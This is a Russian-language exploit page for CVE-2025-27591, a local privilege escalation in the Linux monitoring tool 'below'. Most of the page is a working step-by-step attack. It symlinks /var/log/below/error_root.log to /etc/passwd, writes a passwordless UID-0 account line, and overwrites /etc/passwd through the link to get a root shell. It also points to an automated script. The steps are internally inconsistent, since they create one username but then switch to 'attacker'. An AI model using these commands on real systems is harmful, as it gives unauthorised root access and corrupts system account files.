## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DOLLARBOYSUSHIL-LINUX-PRIVILEGE-ESCALATION-CVE-2025-27591
# CVE-2025-27591 - Повышение привилегий через доступный для записи симлинк в `below`
## Сводка
Это простой эксплойт для **CVE-2025-27591** — уязвимости локального повышения привилегий в инструменте мониторинга Linux `below`. Уязвимость затрагивает версии до v0.9.0 и связана с некорректными назначениями прав доступа в системе. Проблема была обнаружена в январе 2025 года и публично раскрыта 12 марта 2025 года (SecurityOnline, OpenWall). При запуске `below` с `sudo` ошибки могут записываться в общедоступный для записи каталог (`/var/log/below`), что позволяет злоумышленникам создавать симлинк на чувствительные цели, такие как `/etc/passwd`.
Используя это, непривилегированный пользователь с доступом к `below` через `sudo` может повысить привилегии до root.
* * *
## Детали уязвимости
* **CVE ID** : CVE-2025-27591
* **Уязвимый инструмент** : `below`
* **Затрагиваемая функция** : запись журнала через `below record`
* **Уязвимый путь** : `/var/log/below/error_root.log`
* **Предварительные условия атаки** :
* Каталог `/var/log/below` доступен для записи всем пользователям
* Злоумышленник может запускать `sudo /usr/bin/below record` без пароля
* * *
# Шаги эксплуатации (вручную)
✅ Шаг 1: Проверьте, что каталог журнала доступен для записи всем Вы должны увидеть:
root@kitploit:~
drwxrwxrwx 2 root root 4096 ... /var/log/below

✅ Шаг 2: Удалите существующий `error_root.log`
root@kitploit:~
rm -f /var/log/below/error_root.log
✅ Шаг 3: Создайте симлинк на /etc/passwd
root@kitploit:~
ln -s /etc/passwd /var/log/below/error_root.log
затем проверьте с помощью
root@kitploit:~
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

✅ Шаг 4: Создайте файл полезной нагрузки Это добавит нового root-пользователя attacker без пароля:
root@kitploit:~
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
структура файла
root@kitploit:~
username:password:UID:GID:comment(home/full name):home_directory:shell
ключевой момент здесь — UID и GUID мы устанавливаем UID и GUID в 0, что делает пользователя root-пользователем, а Group ID = root-группа

✅ Шаг 5: Вызовите запись журнала от имени root Это ядро эксплойта.
root@kitploit:~
sudo /usr/bin/below record
Эта команда, как ожидается, завершится ошибкой или по тайм-ауту — но она попытается записать журнал ошибок в /var/log/below/error_root.log, который на самом деле является /etc/passwd. 💡 В некоторых случаях этого может быть достаточно для повреждения /etc/passwd — поэтому далее мы полностью перезаписываем его.
✅ Шаг 6: Перезапишите /etc/passwd через симлинк
root@kitploit:~
cp /tmp/payload /var/log/below/error_root.log

✅ Шаг 7: Станьте root
root@kitploit:~
su attacker
Вы попадёте в root-оболочку, пароль не нужен.

# Шаги эксплуатации (автоматически)
root@kitploit:~
python3 dbs_exploit.py
